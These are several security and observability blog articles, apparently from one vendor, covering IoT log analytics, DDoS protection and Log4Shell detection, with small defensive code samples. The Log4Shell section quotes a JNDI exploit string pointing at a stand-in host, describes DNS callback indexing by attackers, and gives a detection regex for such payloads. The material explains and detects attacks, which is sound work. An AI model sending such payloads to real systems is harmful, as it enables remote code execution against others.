When your data is centralized, you can also begin to make predictions. For example, in the world of IoT security, you may wish to trigger alarms when certain access logs are detected on your IoT device because they may be the footprint of a malicious attack. In a business context, you may wish to infer trends from your measurements, for example, if the temperature reported by a thermostat has begun to increase sharply and its current trajectory means it will soon exceed operational thresholds. It is far better to warn the user before it happens than after it has already happened.
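A minimal sketch of such a projection, assuming a simple least-squares line over recent readings (a real system would use smoothing and more robust statistics):

```python
def minutes_until_threshold(readings, threshold):
    """readings: list of (minute, value) pairs in time order.
    Fits a straight line and returns the number of minutes after the
    last reading until the line crosses threshold, or None if the
    value is not trending upward."""
    n = len(readings)
    xs = [r[0] for r in readings]
    ys = [r[1] for r in readings]
    x_mean = sum(xs) / n
    y_mean = sum(ys) / n
    denom = sum((x - x_mean) ** 2 for x in xs)
    slope = sum((x - x_mean) * (y - y_mean) for x, y in readings) / denom
    if slope <= 0:
        return None  # flat or falling: no crossing ahead
    intercept = y_mean - slope * x_mean
    cross = (threshold - intercept) / slope
    return max(0.0, cross - xs[-1])
```

For readings climbing one degree per minute from 20 toward a threshold of 30, this predicts the crossing several minutes ahead, which is exactly the window in which you want the alert to fire.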

This is regularly done with log analytics and metrics. Rather than introducing highly complex and sophisticated time-series databases into your infrastructure, why not leverage the infrastructure you already have?

You’ll need your observability infrastructure anyway!

When you’re building out your complex IoT system, you’re inevitably going to need to build out your observability stack. With such a complex, distributed infrastructure, IoT monitoring and the insights it brings will be essential in keeping your system working. 

This system will need to handle a high volume of traffic, and that volume will only increase as your logging system faces the unique challenges of IoT software. For example, logs can indicate the success of a firmware rollout across thousands of devices worldwide. This is akin to having thousands of tiny servers that must be updated. Couple that with the regular operating logs that a single server can produce, and the scale of the IoT monitoring challenge comes into perspective.

Log analytics provide a tremendous amount of information and context that will help you get to the bottom of a problem and understand the overall health of your system. This is even more important when you consider that your system could span multiple continents with varying degrees of connectivity, and that these devices may be moving around, being dropped, or worse! Without a robust IoT monitoring stack that can process the immense volumes associated with IoT data collection, you’re going to be left confused as to why a handful of your devices have just disappeared.

Improving IoT Security

With this increased observability comes the power to detect and mitigate security threats immediately. Take the recent Log4Shell vulnerability: vulnerabilities like it, which exist in many places at once, are challenging to track and mitigate. With a robust observability system optimized for the distributed world of IoT security, you will already have many of the tools you need to avoid these kinds of serious threats.

Your logs are also retained for as long as you like, with many long-term archiving options if you need them. This means that you can respond instantly and reflect on your performance in the long term, giving you vital information to inspect and adapt your ways of working.

Conclusion

IoT security, observability, and operational success are a delicate balance to achieve, but what we’ve explored here is the potential for log analytics to take a much more central role than simply being one aspect of your monitoring stack. A river of information from your devices can be analyzed by a wealth of open source and SaaS tools, providing you with actionable insights that can be the difference between success and failure.

DDoS Attacks: How to Protect Yourself from Political Cyber Attacks

In the past 24 hours, the funding website GiveSendGo has reported that it has been the victim of a DDoS attack, in response to the politically charged debate about funding for vaccine skeptics. The GiveSendGo DDoS is the latest in a long line of political cyberattacks that have relied on the DDoS mechanism as a form of political activism. There were millions of these attacks in 2021 alone.

But wait, what is a DDoS attack?

Most attacks rely on some new vulnerability being released into the wild, like the Log4Shell vulnerability that appeared in December 2021. DDoS attacks are slightly different. They sometimes exploit known vulnerabilities, but DDoS attacks have another element at their disposal: raw power.

DDoS stands for Distributed Denial of Service. These attacks have a single motive: to prevent the target from being able to deliver its service. This means that when you’re the victim of a DDoS attack, without adequate preparation, your entire system can be brought to a complete halt without any notice. This is exactly what the GiveSendGo DDoS attack has done.

A DDoS attack usually consists of a network of attackers that collaborate to form a botnet. A botnet is a network of machines willing to donate their processing power in service of an attack. These machines then collaborate to send a vast amount of traffic to a single target, like a digital siege, preventing other legitimate traffic in or out of the website.

What makes DDoS attacks so dangerous?

When a single user is scanning your system for vulnerabilities, a basic intrusion detection system will pick up on the patterns. Such users usually operate from a single location and can be blacklisted in seconds. DDoS attacks, however, originate from thousands of different points in the botnet and often attempt to mimic legitimate traffic. Detecting the patterns requires a sophisticated observability system that many organizations do not invest in until it’s too late.
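The difference is easy to see if you profile a traffic window by source IP. This toy comparison is illustrative only; real detection must also account for spoofing and legitimate traffic spikes:

```python
from collections import defaultdict

def traffic_profile(requests):
    """requests: list of source-IP strings observed in a time window.
    Returns how many distinct sources appeared and what share of the
    traffic the single busiest source accounts for."""
    counts = defaultdict(int)
    for ip in requests:
        counts[ip] += 1
    total = len(requests)
    return {
        "unique_ips": len(counts),
        "top_source_share": max(counts.values()) / total,
    }
```

A lone scanner produces a profile dominated by one IP, which is trivial to blacklist; botnet traffic is spread thinly across thousands of sources, so per-IP blocking barely dents it.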

But that’s not all…

It is common for DDoS attacks to attract more skilled hackers to the situation, who are able to discover and exploit more serious vulnerabilities. DDoS attacks create a tremendous amount of chaos and noise. Monitoring stops working, servers crash, alerts trigger. All of this makes it difficult for your security engineers to actively defend your infrastructure. This may expose weaknesses that are difficult to combat.

Why are these attacks so common in political situations?

With enough volunteers, a DDoS attack can begin without the need for skilled cybersecurity specialists. These attacks don’t rely on new vulnerabilities that require specialized software to be exploited. To make things worse, the people who take part in a DDoS don’t need to be technical experts either. They could be “script kiddies” making use of existing software, they could be technical experts, or, most commonly, they could simply be people who can navigate to a website and follow some basic instructions.

While we don’t know the details of the GiveSendGo DDoS attack yet, we can assume that this attack, like most other DDoS attacks, is the work of a small group of tech-savvy instigators and a much larger group of contributors. This means that if a situation has enough people around it, a DDoS attack can rapidly form out of nothing and escalate a situation from a disagreement to a commercial disaster.

So what can you do about it?

There are several common steps that companies take to protect themselves from a DDoS attack. Each of these is a crucial defensive mechanism to ensure that if you do find yourself on the receiving end of a DDoS, you’re able to stay in service long enough to defend yourself.

Make use of a CDN: it was crucial in the GiveSendGo DDoS attack

Content Distribution Networks (CDNs) provide a layer between you and the wider Internet. Rather than directly exposing your services to the public, you can use a CDN to distribute your content globally. CDNs have several great benefits, such as speeding up page load times and offering greater reliability for your site.

In the case of a DDoS attack, your CDN can act as a perimeter around your system and take the brunt of the attack. This buys you time to proactively defend against the incoming storm. The Cloudflare CDN has been one of the reasons why GiveSendGo hasn’t completely crashed during the attack.

Route everything through a Web Application Firewall

A Web Application Firewall (WAF) is a specialized tool to process and analyze incoming traffic. It will automatically detect malicious attacks and prevent them from reaching your system. This step should come after your CDN. The CDN will provide resilience against sudden spikes in traffic. Still, you need this second layer of defense to ensure that anything that makes it through is scrutinized before it is permitted to communicate with your servers.

Invest in your Observability

Automated solutions that sit in front of your system will make your task easier, but they will never fully eliminate the problem. Your challenge is to create an observability stack that can help you filter out the noise of a DDOS attack and focus on the problems you’re trying to solve. 

Coralogix is a battle-tested, enterprise-grade SaaS observability solution that can do just that. It includes everything from machine learning-driven anomaly detection to SIEM/SOAR integrations with some of the most ubiquitous tools in the cybersecurity industry. Coralogix can give you operational insights on a range of typical challenges.

An investment in your observability stack is one of the fundamental steps in achieving a robust security posture in your organization. With the flexibility, performance, and efficiency of Coralogix, you can gain actionable insights into the threats that face your company as you innovate and achieve your goals.

How to Detect Log4Shell Events Using Coralogix

What is Log4Shell?

The Log4J library is one of the most widely-used logging libraries for Java code. On the 24th of November 2021, Alibaba’s Cloud Security Team found a vulnerability in the Log4J framework, now known as Log4Shell, that provides attackers with a simple way to run arbitrary code on any machine that uses a vulnerable version of Log4J. The vulnerability was publicly disclosed on the 9th of December 2021.

One of the interesting things about this vulnerability is that it has existed in the code since 2013 and, as far as we know, was not noticed for eight long years.

The way this kind of attack works is straightforward. The attacker needs to know which user-controlled data in a given application will eventually be logged. Using that information, the attacker can send a simple text line like ${jndi:ldap://example.com/file} to that field. When the server passes that string to the logger, the logger will attempt to resolve it by connecting to an LDAP server at the address ‘example.com.’

This will, of course, cause the vulnerable server to use its DNS mechanism to resolve that address first, which allows attackers to “carpet bomb” a target by sending many variations of this string to many fields, such as the “User-Agent” and “X-Forwarded-For” headers. In many cases, the attacker would use the JNDI string to point the vulnerable server to an LDAP server at an address like <the victim’s domain name>.<the field used to attack>.<a random text used as the attack’s ID>.<attacker controlled domain>.

By doing so, the attacker, who controls the authoritative DNS server for their domain, can use that server’s logs to build an index of all the domain names and IP addresses that are vulnerable to this kind of attack, including which field is the vulnerable one.
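A first-pass detector for unobfuscated payloads can be as simple as a regular expression over your log lines. This sketch ignores the ${lower:...}-style evasions seen in the wild, so treat it as a starting point rather than a complete detection rule:

```python
import re

# Matches plain JNDI lookup strings over the protocols commonly abused
# in Log4Shell exploitation attempts.
JNDI_RE = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def find_jndi_attempts(log_lines):
    """Return the log lines that contain a plain JNDI lookup string."""
    return [line for line in log_lines if JNDI_RE.search(line)]
```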

More than a single way to detect it

Logs, logs, and more logs

Coralogix, unlike many traditional SIEMs, was not built to hold only “security-related events” (if that is even a thing) but rather to hold any type of textual data. This means that in most cases, it contains all the information and tools that you’ll need to detect security threats without having to do anything special except for creating simple alerting rules.

If you, like many of our customers, are sending your applications and servers logs to Coralogix, you can simply search for the string “JNDI” in your Internet-facing applications’ logs. If you find something like this, you should take a deeper look:

Coralogix logs

By simply clicking the “fwd” field and selecting “show graph for key,” you’ll see something that looks like this (all the masked items contained IPv4 addresses or comma-separated lists of IP addresses):

Field Visualization

That certainly looks suspicious. If you had followed our recommendation to create a NewValue alert that fires for every new value in that field that does not match the expected pattern (a collection of numbers, dots, and commas), Coralogix would have alerted you about the attempt even before the attack was publicly disclosed, even if the communication to the vulnerable service was encrypted.

Coralogix STA – Passive Mode

With Coralogix STA (Security Traffic Analyzer) installed, you’ll be able to dig even deeper. The STA allows you to analyze the traffic to and from EC2 interfaces and get all the essential information from it as logs in Coralogix. In this case, if the traffic to the server contained an attempt to exploit the Log4Shell vulnerability and it was not encrypted (or if it was encrypted but the STA’s configuration contained the key used to encrypt the traffic), Coralogix will automatically detect that and issue the following alert:

Coralogix Security Traffic Analyzer

Suppose the communication to the vulnerable server is encrypted and the STA doesn’t have the appropriate key to decipher it. In that case, Suricata won’t be able to detect the JNDI payload in the traffic, and such alerts won’t fire. But even if you don’t send your application logs to Coralogix and the traffic to the Internet-facing service is encrypted, not all is lost.

Coralogix might not be able to detect the attack before it starts, but the Coralogix STA can still detect the attack while it is in progress. As you may have already noticed, this vulnerability works by causing the server to contact an external server using the LDAP protocol, which in turn causes the server to issue a DNS request. That DNS request will not be encrypted, even if the connection to the server was.

This allows the STA to detect the call to the attacker’s command and control server, a pattern that can result from a Log4Shell attack but also from other types of attacks.

Because this communication pattern contains a random string (the attack ID), it is most likely to get a relatively low NLP-based score. The queried domain name will also be rather long, which will trigger the alert about suspicious domain names (domains that are both long and have a low NLP score). In addition, the relatively high number of such unique requests will probably trigger a Zeek notice about an increased number of unique queries per parent domain.
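A rough stand-in for such scoring is Shannon entropy over the first label of the queried name. The thresholds below are assumptions for the sketch, and Coralogix’s actual NLP-based scoring works differently:

```python
import math
from collections import Counter

def is_suspicious_domain(name, min_len=30, min_entropy=3.5):
    """Flag query names that are both long and whose first label has
    high character entropy, i.e. looks machine-generated rather than
    like a natural-language word."""
    label = name.split(".")[0]
    counts = Counter(label)
    # Shannon entropy in bits per character of the first label.
    entropy = -sum((c / len(label)) * math.log2(c / len(label))
                   for c in counts.values())
    return len(name) >= min_len and entropy >= min_entropy
```

A random attack-ID label scores near the maximum entropy for its alphabet, while ordinary hostnames like www score near zero, which is why this simple heuristic separates the two so cleanly.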

Coralogix STA – Active Mode

Another option for detecting this vulnerability is to deploy Wazuh agents on critical servers and connect them to the STA. The Wazuh agent will automatically pull the list of all installed software packages on the host and forward it to the STA, which checks that information against the lists of vulnerabilities published by NIST, Red Hat, and Canonical. Wazuh can also be instructed to run an executable and parse its output. By configuring Wazuh to run a tool such as Grype, which analyzes the library dependencies of every piece of software it checks, it is possible to detect vulnerable software even before the first exploit attempt.

Some more logs…

Since outbound connections using the LDAP protocol are usually not allowed in corporate environments, the service will eventually fail to reach the relevant server. This will lead to many exceptions that will be logged as part of the service logs and will most likely cause a flow anomaly alert to fire in Coralogix.

Summary

Coralogix makes it possible to easily detect and investigate Log4Shell cases by ingesting application, infrastructure, or STA logs. By combining this with an XSOAR integration, it is possible to take action based on this detection and help prevent the attack from spreading.